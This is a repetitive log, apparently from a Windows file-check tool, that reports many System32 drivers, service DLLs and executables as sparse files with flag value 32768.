    File "C:\WINDOWS\System32\drivers\CmBatt.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\cng.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\CNGHWASSIST.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dllhost.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\condrv.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\dam.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\dfsc.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\disk.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DiagSvcs\DIAGNOSTICSHUB.STANDARDCOLLECTOR.SERVICE.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DiagSvcs\DIAGNOSTICSHUB.STANDARDCOLLECTOR.SERVICE.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\dmvsc.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\drmkaud.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\drmkaud.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\serial.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\dxgkrnl.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\tcpip.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\EHSTORCLASS.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\EHSTORTCGDRV.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\EHSTORTCGDRV.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\errdev.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\fileinfo.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\FXSSVC.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\SerCx.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\SpbCx.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\fcvsc.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\fdc.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\FILECRYPT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vmstorfl.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ipfltdrv.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\FILETRACE.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\fltMgr.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\monitor.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\FSDEPENDS.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\STORQOSFLT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\fvevol.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\GAGP30KX.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ndisuio.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\MSGPIOCLX.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\GPUENERGYDRV.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\GPUENERGYDRV.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\rasl2tp.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mrxsmb.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\hdaudbus.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\hdaudbus.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\hidbatt.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\hidbth.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\hidi2c.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\HIDINTERRUPT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\HIDINTERRUPT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\hidir.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\hidusb.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\http.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\hwpolicy.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\hyperkbd.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\Ndu.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\HYPERVIDEO.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\HYPERVIDEO.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ndproxy.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\i8042prt.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\SysWOW64\perfhost.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\IEETWCOLLECTOR.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\intelide.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\intelpep.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\intelppm.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\IPMIDrv.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ipnat.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\msiscsi.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\kbdclass.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\kbdhid.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ksecdd.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ksecpkg.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ksecpkg.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ksthunk.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vpci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\lltdio.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mqac.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mmcss.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mskssrv.sys" is sparse (flags = 32768)
    File "C:\Program Files\Windows Defender\MsMpEng.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\wimmount.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\wimmount.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mrxdav.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\modem.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mspqm.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mouclass.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mouhid.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mountmgr.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mrxsmb10.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mrxsmb20.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\Ucx01000.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ufx01000.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\bridge.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\VSSVC.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msdtc.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\MSHIDKMDF.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\MSHIDUMDF.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\msisadrv.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mstee.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msiexec.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mslldp.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mssmbios.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\MTConfig.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\nwifi.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\nwifi.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\netbios.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ndis.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ndiscap.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\NDISIMPLATFORM.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\tunnel.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ndistapi.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbhub.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\NDISVIRTUALBUS.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ndiswan.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\netbt.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\NPSVCTRIG.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\NPSVCTRIG.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\nsiproxy.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\NV_AGP.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbehci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbehci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbohci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbohci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbuhci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbuhci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\USBXHCI.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\parport.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\vds.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\partmgr.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\pci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\pcw.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\pdc.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\pcmcia.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\PEAuth.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\qwavedrv.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\raspptp.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\processr.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\pacer.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\rasacd.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\agilevpn.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\raspppoe.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\rassstp.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\rdbss.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\rdpbus.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\rdpdr.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\RDPVIDEOMINIPORT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\RDPVIDEOMINIPORT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\rdyboost.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\servicing\TRUSTEDINSTALLER.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vms3cap.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\sbp2port.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WdFilter.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\scfilter.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SENSORDATASERVICE.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\serenum.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\SerCx2.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\sermouse.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\URSCX01000.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\sfloppy.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\snmptrap.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\SPACEPORT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\SPACEPORT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sppsvc.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\srvnet.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\volmgrx.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\storahci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\stornvme.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\storufs.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\storvsc.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\tcpipreg.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\tdx.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\tpm.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\terminpt.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vdrvroot.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\TsUsbFlt.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\TsUsbGD.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\UAGP35.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\uaspstor.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\UcmCx.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\Udecx.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbccgp.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\UI0DETECT.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ULIAGPKX.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\umbus.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\USBAUDIO.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbcir.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\USBHUB3.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbprint.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbser.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\USBSTOR.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\VERIFIEREXT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vhdmp.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vhf.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vmbus.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\VMBusHID.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\volsnap.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vsmraid.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vwifibus.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vwififlt.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\wacompen.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WUDFRd.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\wanarp.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\winusb.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbengine.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WdBoot.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\Wdf01000.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WdiWiFi.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WdNisDrv.sys" is sparse (flags = 32768)
    File "C:\Program Files\Windows Defender\NisSrv.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\wfplwfs.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WINDOWSTRUSTEDRT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\wmiacpi.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbem\WmiApSrv.exe" is sparse (flags = 32768)
    File "C:\Program Files\Windows Media Player\wmpnetwk.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\wpcfltr.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WPDUPFLTR.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ws2ifsl.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WUDFPf.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\AJRouter.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WINDOWS.STATEREPOSITORY.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WINDOWS.STATEREPOSITORY.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\AUDIOENDPOINTBUILDER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\AUDIOENDPOINTBUILDER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WALLETSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\APPXDEPLOYMENTSERVER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\APPXDEPLOYMENTSERVER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\EMBEDDEDMODESVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\inetsrv\APPHOSTSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ipnathlp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\lsm.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\umpnpmgr.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\rpcss.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\appinfo.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\appidsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\AxInstSv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dcpsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\APPREADINESS.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\audiosrv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\RpcEpMap.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dssvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\bdesvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\BFE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\XBLAUTHMANAGER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\netman.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DEVICESETUPMANAGER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\cdpsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\umpo.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\qmgr.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ListSvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\lltdsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\bisrv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dhcpcore.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\browser.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\BthHFSrv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\BthHFSrv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\profsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\pnrpsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\bthserv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\provsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\das.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\LICENSEMANAGERSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\certprop.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DMWAPPUSHSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ClipSVC.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\COREMESSAGING.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\COREMESSAGING.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\cryptsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TETHERINGSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TETHERINGSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\moshost.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\moshost.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DEFRAGSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DEVQUERYBROKER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wscsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WsmSvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wersvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wecsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wcmsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wkssvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dot3svc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DIAGTRACK.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DIAGTRACK.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WINDOWS.INTERNAL.MANAGEMENT.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WINDOWS.INTERNAL.MANAGEMENT.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\MPSSVC.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\fdPHost.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dnsrslvr.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dps.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WERCPLSUPPORT.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\eapsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\efssvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ENTERPRISEAPPMGMTSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ENTERPRISEAPPMGMTSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\FntCache.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\es.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sdrsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\srvsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\FDResPub.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\upnphost.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\fhsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\gpsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\hidserv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\IKEEXT.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\iphlpsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\keyiso.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msdtckrm.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\lfsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\lmhsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\iscsiexe.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\nsisvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\nlasvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ngcsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NcaSvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NCDAUTOSETUP.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NCBSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\netlogon.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\trkwks.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NETPROFMSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NETSETUPSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NETSETUPSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\icsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NGCCTNRSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\APHOSTSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\pcasvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\p2psvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\PIMINDEXMAINTENANCE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\PIMINDEXMAINTENANCE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\pla.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\pnrpauto.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\IPSECSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\qwave.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\rasauto.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\rasmans.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\mprdim.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\regsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\RDXSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\RDXSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\schedsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SCardSvr.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\XBLGAMESAVE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SCDEVICEENUM.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\seclogon.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\Sens.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SENSORSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sensrsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SessEnv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\shsvcs.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TILEOBJSERVER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TILEOBJSERVER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\smphost.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SMSROUTERSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\StorSvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sstpsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ssdpsrv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wiaservc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\svsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\swprv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\inetsrv\iisw3adm.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sysmain.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SYSTEMEVENTSBROKERSERVER.DLL" is sparse (flags = 32768)
